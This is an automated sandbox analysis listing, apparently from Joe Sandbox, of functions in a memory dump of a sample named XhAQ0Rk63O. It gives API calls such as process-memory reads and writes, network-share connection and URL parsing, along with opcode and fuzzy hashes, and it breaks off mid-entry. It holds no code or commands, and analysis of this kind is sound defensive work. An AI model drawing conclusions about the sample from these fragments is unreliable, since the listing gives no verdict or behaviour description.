                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1489400265-0
                                                                                          • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                          • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
                                                                                          • Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                          • Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
                                                                                          Function 0045551F Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                          • DeleteObject.GDI32(?), ref: 0045564E
                                                                                          • DeleteObject.GDI32(?), ref: 0045565C
                                                                                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                          • String ID:
                                                                                          • API String ID: 1042038666-0
                                                                                          • Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                          • Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
                                                                                          • Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                          • Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
                                                                                          Function 0043315E Relevance: 7.5, APIs: 5, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                          • String ID:
                                                                                          • API String ID: 2625713937-0
                                                                                          • Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                          • Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
                                                                                          • Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                          • Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
                                                                                          Function 004140CF Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                          • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                            • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                            • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                            • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                          • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                            • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                          • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                            • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                                          • ExitThread.KERNEL32 ref: 0041410F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                                          • __freefls@4.LIBCMT ref: 00414135
                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                          • String ID:
                                                                                          • API String ID: 132634196-0
                                                                                          • Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                                          • Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
                                                                                          • Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                                          • Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
                                                                                          Function 00415601 Relevance: 7.5, APIs: 5, Instructions: 23threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
                                                                                            • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                                          • __getptd_noexit.LIBCMT ref: 00415620
                                                                                          • CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
                                                                                          • __freeptd.LIBCMT ref: 0041563B
                                                                                          • ExitThread.KERNEL32 ref: 00415643
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                          • String ID:
                                                                                          • API String ID: 3798957060-0
                                                                                          • Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                          • Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
                                                                                          • Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                                          • Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
                                                                                          Function 0041567F Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                                          • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                            • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                            • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                            • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                          • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                            • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                          • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                            • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                          • ExitThread.KERNEL32 ref: 004156BD
                                                                                          • __freefls@4.LIBCMT ref: 004156D9
                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                          • String ID:
                                                                                          • API String ID: 1537469427-0
                                                                                          • Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                          • Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
                                                                                          • Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                                          • Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
                                                                                          Function 0040AB16 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 423COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _malloc
                                                                                          • String ID: Default$|k
                                                                                          • API String ID: 1579825452-2254895183
                                                                                          • Opcode ID: becd5b91230c6b3cce4541e76e7ed3885ca0e1da08972e6e30288734a84e99a9
                                                                                          • Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
                                                                                          • Opcode Fuzzy Hash: becd5b91230c6b3cce4541e76e7ed3885ca0e1da08972e6e30288734a84e99a9
                                                                                          • Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B
                                                                                          Function 0044F0B1 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 377COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memcmp
                                                                                          • String ID: '$[$h
                                                                                          • API String ID: 2931989736-1224472061
                                                                                          • Opcode ID: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                                          • Instruction ID: c2eec353cbd26a418970a1643da97c958d9efd09d44d369c5aec2a2e92b02032
                                                                                          • Opcode Fuzzy Hash: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                                          • Instruction Fuzzy Hash: EBE1B3756083858FE725CF28C8807ABBBE1FFC9304F18896EE89587341D7799849CB56
                                                                                          Function 0044F1F5 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 358COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strncmp
                                                                                          • String ID: >$R$U
                                                                                          • API String ID: 909875538-1924298640
                                                                                          • Opcode ID: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
                                                                                          • Instruction ID: f6794502b7c89560a677b30a08de70cb8bc1b17d125f16f135907c58c8460d8d
                                                                                          • Opcode Fuzzy Hash: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
                                                                                          • Instruction Fuzzy Hash: 46E19C745083818FEB25CF29C49076BBBE1EFD9304F28496EE89587381D378E849CB56
                                                                                          Function 0046CDA0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                          • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                                          • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                                          • CoUninitialize.OLE32 ref: 0046CE50
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                          • String ID: .lnk
                                                                                          • API String ID: 886957087-24824748
                                                                                          • Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                          • Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
                                                                                          • Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                          • Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
                                                                                          Function 00469BED Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 219COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen
                                                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                          • API String ID: 176396367-557222456
                                                                                          • Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                          • Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
                                                                                          • Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                          • Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
                                                                                          Function 0042D2CC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 204COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                          • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                                                                                          • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearCopyInit_malloc
                                                                                          • String ID: 4RH
                                                                                          • API String ID: 2981388473-749298218
                                                                                          • Opcode ID: 33330a00173044044b3d4ba47678e2926b365edad981b8cf660d8c4061008482
                                                                                          • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                                                                                          • Opcode Fuzzy Hash: 33330a00173044044b3d4ba47678e2926b365edad981b8cf660d8c4061008482
                                                                                          • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                                                                                          Function 004667A7 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 170shareCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                            • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                          • __wcsnicmp.LIBCMT ref: 0046681A
                                                                                          • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                          • String ID: LPT$HH
                                                                                          • API String ID: 3035604524-2728063697
                                                                                          • Opcode ID: 4168d29b7d0848dc605f9ce781fdb6688c60699af114ee795911c582be7b9077
                                                                                          • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
                                                                                          • Opcode Fuzzy Hash: 4168d29b7d0848dc605f9ce781fdb6688c60699af114ee795911c582be7b9077
                                                                                          • Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
                                                                                          Function 00438A5D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2
                                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                                                                                            • Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5
                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                                                                                          • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$MemoryProcess$ReadWrite
                                                                                          • String ID: @
                                                                                          • API String ID: 4055202900-2766056989
                                                                                          • Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                          • Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
                                                                                          • Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                          • Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
                                                                                          Function 00465D41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CrackInternet_memset_wcslen
                                                                                          • String ID: |
                                                                                          • API String ID: 915713708-2343686810
                                                                                          • Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                                          • Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
